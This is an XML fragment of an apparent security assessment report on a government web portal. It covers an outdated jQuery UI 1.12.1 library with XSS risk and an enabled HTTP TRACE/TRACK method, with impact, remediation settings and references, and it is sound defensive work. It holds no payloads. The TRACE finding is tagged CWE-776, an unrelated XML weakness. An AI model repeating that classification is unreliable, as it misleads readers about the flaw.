    <w:p w14:paraId="4CCAC977" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9FA5C3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A6E0E9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/79.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120F37E5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvd.nist.gov/vuln/detail/CVE-2016-7103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDFF95F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://blog.jqueryui.com/2016/09/jquery-ui-1-12-0-released/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676E9FA7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://portswigger.net/web-security/cross-site-scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EFCA79" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3740A7"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0FB791B6"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25B7FF17" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Use of Vulnerable Component: jQuery UI 1.12.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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1EC1E695" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>MEDIUM CVSS 6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="105DB3B5"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1BA16C3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5C3F041"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8E4F515" w14:textId="045C80AE"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019</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29B100F"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1C3B272" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.1 (Medium)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="447FC5C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AC1A904"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27DBDEC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A06:2021-Vulnerable and Outdated Components</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CEBB470"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976253E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-937</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="540D350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4D2CEFC"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65B9122"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1DB9B4C"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0E17333" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="49653B6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9B85504"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FA23D83"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E1EBA3C"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BDB5C00" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="6F032D0D"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BA58CC1"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9159EE2"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D7D049E"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026E3F0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67E434C5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C96B1E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The application utilizes jQuery UI version 1.12.1, an outdated JavaScript library known to contain several security vulnerabilities. These vulnerabilities, primarily Cross-Site Scripting (XSS) flaws, could allow an attacker to inject malicious client-side scripts into web pages that use the affected library components. Exploitation typically involves convincing a user to interact with a specially crafted input or URL that leverages a vulnerable widget or feature within jQuery UI. When a user's browser renders the page, the injected script executes in the context of the user's browser, potentially leading to session hijacking, defacement, unauthorized data access, or redirection to malicious sites. The affected component is the jQuery UI JavaScript library itself, which can impact any web page, feature, or custom component built upon it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221F39EA" w14:textId="6F32678D" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD7B95" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The presence of outdated and vulnerable software components like jQuery UI 1.12.1 exposes the government portal to significant risks. Exploitation of known vulnerabilities could lead to unauthorized access to sensitive user data, potentially resulting in severe data breaches and compromise of the system's integrity. Such incidents can cause substantial financial losses due to incident response, recovery efforts, and potential regulatory fines for non-compliance with data protection mandates, such as those under NIST CSF. Furthermore, a security breach severely damages public trust in the government portal, leading to reputational harm and erosion of user confidence, which can have long-term negative impacts on public engagement and service delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717AD818" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C1102D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture): Implement a robust Software Component Analysis (SCA) strategy to continuously monitor all third-party libraries and dependencies for known vulnerabilities and ensure their lifecycle management. Establish a regular patching and update cycle for all software components, including client-side libraries, to mitigate risks associated with outdated versions. Prioritize the use of well-maintained and actively supported libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599640C6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="743FCF22" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX (Code Implementation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFA3812" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Upgrade jQuery UI to the latest stable version (e.g., 1.13.x or higher) to incorporate all available security fixes. Ensure thorough testing is conducted after the upgrade to prevent any functional regressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7045F9F4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Review all application code that interacts with jQuery UI components to ensure proper input validation and output encoding are consistently applied. This helps to mitigate XSS risks even in cases where the library might have inherent vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479309AA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Remove any unused or deprecated jQuery UI components or entire libraries from the application to reduce the attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE69AB1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC973A3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. Access the target government portal using a web browser (e.g., Chrome, Firefox). 2. Open the browser's developer tools (typically by pressing F12). 3. Navigate to the 'Sources' or 'Network' tab within the developer tools. 4. Inspect the loaded JavaScript files to identify 'jquery-ui.js' or 'jquery-ui.min.js'. 5. Review the header comments or content of the identified jQuery UI file to ascertain its version number. 6. Confirm that the detected version is 1.12.1, indicating the presence of the vulnerable library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E65E718" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765F4401" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://jqueryui.com/upgrade-guide/1.13/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC0D4B9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://portswigger.net/web-security/cross-site-scripting/reflected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AD8882" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="135AD220"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5A6F3DE9"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1E3BC282" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>HTTP TRACE/TRACK Method Enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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75A1C77F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>MEDIUM CVSS 5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78A6E756"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5BD3727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605CA53"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72FA434" w14:textId="0527D17E"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-016</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9BB0E66"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82418AD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5.3 (Medium)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="63B4E431"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9DB6CB0"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1E588E2"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DC123FC"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58E6B3E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-776</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="5A71A519"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DA30E42"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366C760"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8FBA010"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8387F1F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="2340935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4D78BF1"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6C2090E9"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8643E38"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8B3C2AE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="3161E04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F61031C"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C14434"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C62629E"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56E3E89" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12E56A05" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06210914" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The HTTP TRACE and TRACK methods are designed for diagnostic purposes, allowing a client to see exactly what the server receives back from its request. When enabled, a malicious actor could potentially use these methods to steal sensitive information, particularly session cookies or authentication credentials, especially in conjunction with Cross-Site Scripting (XSS) vulnerabilities. This technique, known as "Cross-Site Tracing (XST)," can bypass </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTPOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie protection by reflecting the entire request, including </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTPOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookies, back to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C65EDC7" w14:textId="605E18F0" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5FB6E6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enabling the HTTP TRACE/TRACK method on a government portal introduces a significant risk of sensitive data exposure and potential unauthorized access. If an attacker can leverage this method, particularly in combination with other vulnerabilities, they could potentially steal user session tokens, leading to account compromise for citizens or government personnel. This could result in unauthorized access to sensitive government data, financial fraud, and severe reputational damage to the agency. Furthermore, a data breach stemming from such a misconfiguration would likely lead to non-compliance with regulatory frameworks like NIST CSF, resulting in potential audits, penalties, and a loss of public trust in the government's ability to protect its citizens' information. The costs associated with incident response, forensic analysis, public notification, and legal repercussions could be substantial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF85398" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ABD759" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B711EBD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Implement a global security policy that explicitly prohibits the use of HTTP TRACE and TRACK methods on all production web servers and application servers. This policy should be enforced through standardized configuration templates and regularly audited. Integrate security scanning tools into the CI/CD pipeline to automatically detect and flag such misconfigurations before deployment to production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB51559" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1700C543" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX (Code Implementation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139C4B39" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Disable the HTTP TRACE and TRACK methods on the web server or application server hosting the government portal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFE7FCE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5779E138" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>For Apache HTTP Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C20405" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Add the following line to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>httpd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or relevant virtual host configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23213C7D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TraceEnable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1A46E0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Then restart the Apache service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041DD373" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07458E9D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>For Apache Tomcat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127CDA7B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Edit the server.xml file and ensure that the AJP/HTTP connector configurations include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD6520F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>allowTrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>="false"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B16FE2F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Then restart the Tomcat service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C225120" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
